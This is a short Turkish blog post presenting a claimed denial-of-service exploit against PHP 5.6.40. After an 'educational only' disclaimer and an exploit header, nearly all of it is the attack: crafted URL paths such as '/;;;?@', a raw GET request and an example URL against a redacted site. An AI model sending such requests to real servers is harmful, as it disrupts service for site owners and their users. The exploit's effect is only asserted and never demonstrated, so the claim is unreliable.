|

PHP 5.6.40 - Denial Of Service



Ali Can Gönüllü tarafından 2019-11-18 02:05:28 tarihinde yazıldı. Tahmini okunma süresi 34 saniye.



Çalışmalarım için bağış yapmak isterseniz Patreon hesabımdan bağışta bulunabilirsiniz.

Blog adresinde yazılanlar sadece eğitim amacıyla deneysel olarak hazırlanmıştır. Konu içerisinde geçen yöntemleri kendi oluşturduğunuz test ortamında denemenizi tavsiye ederiz.
Herhangi bir tarih, yer ve/veya mekanda oluşacak zararlardan alicangonullu.org, alicangonullu.org yöneticisi ve/veya konu yazarı mesul değildir.

PHP 5.6.40 < DoS Exploit

-----------------------------------------------

# Exploit Author : ALİ CAN GÖNÜLLÜ

# Exploit Name : PHP 5.6.40 =< DoS Exploit

# Exploit Date : 11-11-2019

# PHP Build Date : Oct 28 2019 18:49:33

# Exploit System  : x86_64-redhat-linux-gnu (Linux xxx.com 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64)

# Author Instagram : @whoamii.c

 

# Exploit : site.com/;;;?@

OR site.com/;?;?;?;?Q

 

index.php : Empty

 

GET https://xxx.biz/;?;?;?;?Q

Host: xxx.biz

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

Cookie: YoncuKoruma=xxxxxxx; PHPSESSID=uv2spdhqtdhfi68k7fmuoo5ba0

Upgrade-Insecure-Requests: 1

 

Ex:

https://xxx.biz/;;;?@